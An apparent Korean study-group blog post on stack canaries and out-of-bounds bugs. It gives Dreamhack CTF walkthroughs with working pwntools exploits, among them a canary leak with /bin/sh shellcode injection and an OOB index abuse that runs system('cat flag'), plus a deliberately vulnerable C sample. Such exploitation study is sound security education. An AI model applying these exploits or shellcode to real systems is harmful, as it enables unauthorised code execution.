[ASC 스터디] 8주차 - Stack Canary + Out Of Boundary

👉 지난 차시

2022.07.30 - [System-hacking/📖] - [ASC 스터디] 7주차 - Stack Buffer Overflow 문제 풀이, Integer Overflow

 

( 2주치 밀려서 부랴부랴 쓰는중... )

1. Stack Canary

스택 버퍼 오버플로우를 막기 위한 기법이다. ( SFP와 RET 값이 변조 되는 것을 막는다. )

Buffer와 SFP 사이에 랜덤한 4 or 8 바이트의 Canary 값이 삽입된다.

함수 진입시 카나리 값을 설정하고, 함수 종료시 카나리 값이 변조 됐는지 확인한다. 

( 카나리 값이 변조됐다면 __stack_check_fail 함수를 통해 프로그램이 종료된다. )

 

컴파일 방법 :

카나리 해제 : -fno-stack-protector

카나리 설정 : -fstack-protector

 

우회 방법 :

(1) 카나리 값이 고정인 경우 Brute Force

카나리 값을 특정 파일에서 읽어서 사용하거나 fork된 바이너리는 카나리 값이 고정되어있다.

 

(2) 카나리 값 유출

버퍼를 카나리 전까지 채워서 해당 버퍼를 출력할 수 있다면 카나리 값이 붙어서 같이 출력된다.

 

(3) pthread 함수로 실행된 함수 내부의 카나리

스택 하단에 카나리 값으로 비교하는 값이 있는데 해당 값을 덮어쓴다면 카나리 값을 조작할 수 있다. 

 

(4) scanf("%d", buf[i]);

scanf로 카나리 공간을 입력 받을 수 있다면 '+'나 '-'를 입력해 카나리 값을 덮지 않고 우회할 수 있다.

버퍼에 값을 안 쓰고 RET를 덮을 수 있다.

 

카나리 확인 방법 :

 

2. Stack Canary 실습 문제 풀이

문제 풀이1 : leak_canary

동작

checksec leak_canary

카나리 존재

fs:0x28에서 카나리값을 복사해서 rbp-0x8 위치에 넣어준다.

리턴 전에 카나리 변조됐는지 확인하고 있다.

• 트리거하기

버퍼의 크기는 0x70 ?

puts로 버퍼를 출력해주고 있는데, puts는 널문자 전까지 출력해준다.

버퍼의 크기 0x70에서 맨 마지막 0x8만큼 카나리가 있을거니까 0x70-0x8-1만큼 A를 만들어서 보냈다. 이상한 값이 같이 딸려서 출력된다. 아마 카나리 값.

• 익스플로잇

from pwn import *

e = ELF('./leak_canary')
p = process('./leak_canary')

buf = int(p.recvline().split(b' ')[-1], 16)
print('buf : {}'.format(hex(buf)))

# canary leak
p.sendafter(b'MSG : ', b'A'*105)
p.recvuntil(b'A'*105)
canary = u64(b'\x00' + p.recv(7))
print(hex(canary))

p.sendlineafter(b'quit?', b'n')

pay = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'

pay += b'A'*(104-len(pay))
pay += p64(canary)
pay += p64(0)
pay += p64(buf)
p.sendafter(b'MSG : ', pay) 

p.interactive()

 

문제 풀이2 : Bypass Canary v2

plt, got 개념을 알아야 풀 수 있다 ! 뒤에서 공부하고 나서 풀어보자.

 

2. Out Of Boundary (OOB)

버퍼의 길이 범위를 벗어나는 인덱스에 접근할 때 발생하는 취약점이다.

OOB 취약점을 막기 위해서는 인덱스 범위 검사를 해야한다.

 

취약한 코드

#include <stdio.h>
int main()
{
	int b = 10;
    int a[4];
    
    printf("Before B : %d\n", b);
    a[-9] = 20;
    printf("After B : %d", b);
}

-----------------------------------------------------결 과-----------------------------------------------------

Before B : 10

After B : 20

-----------------------------------------------------분 석-----------------------------------------------------

A : 000000F178AFF848

B : 000000F178AFF824

A와 B의 주소 차이는 0x24 = 36 이다. 

 

a[-9]는 a배열 주소인 000000F178AFF848에서 4*9=36 = 0x24 만큼 뺀 곳이다.

000000F178AFF848 - 0x24 = 000000F178AFF824 = B의 주소

따라서 B의 값을 20으로 바꿔버리고 b는 20이 되는 것이다.

 

문제 풀이 : out_of_bound (드림핵)

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>

char name[16];

char *command[10] = { "cat",
    "ls",
    "id",
    "ps",
    "file ./oob" };
void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main()
{
    int idx;

    initialize();

    printf("Admin name: ");
    read(0, name, sizeof(name));
    printf("What do you want?: ");

    scanf("%d", &idx);

    system(command[idx]);

    return 0;
}

char name[16]에 name을 입력받고,

int idx에 숫자를 입력받고,

system함수로 command[idx]를 넣어서 실행시킨다.

 

취약한 부분 :  int 범위에서 받아서 oob가 발생한다.

익스플로잇 : 

1. name 배열에 cat flag를 넣고

2. OOB를 이용해서 name 배열의 위치를 참조하게 한다.

3. system(name배열주소) = system('cat flag') 실행

 

그럼 알아야 할것은 name 배열의 주소와 idx 입력하는 곳의 주소이다.

gdb로 breakpoint걸고 보면,

name

command

두 주소의 차이는 76이고 포인터는 4바이트 크기니까 76 / 4 = 19  

command[19]로 가면 name[0]에 접근할 수 있다.

from pwn import *

p = remote("host3.dreamhack.games", 9969)

name = 0x804a0ac
command = 0x804a060

pay = p32(0x804a0ac+4) #name
pay += b"cat flag"

p.sendafter(b"name:", pay)

p.sendlineafter(b'want?:', str(19))

p.interactive()

 

 

 

⭐공부할 것들

1. 드림핵 Stack Canary 로드맵, Master Canary 로드맵

2. 카나리 문제들 - 학기중에

 

 

 

---

ASC 시스템해킹 스터디